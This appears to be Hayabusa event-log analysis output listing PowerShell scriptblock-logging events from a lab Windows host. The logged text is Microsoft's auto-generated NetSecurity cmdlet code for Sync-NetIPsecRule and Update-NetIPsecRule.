$__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and 
(@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, 
ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = 
${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue 
= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, 
ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { 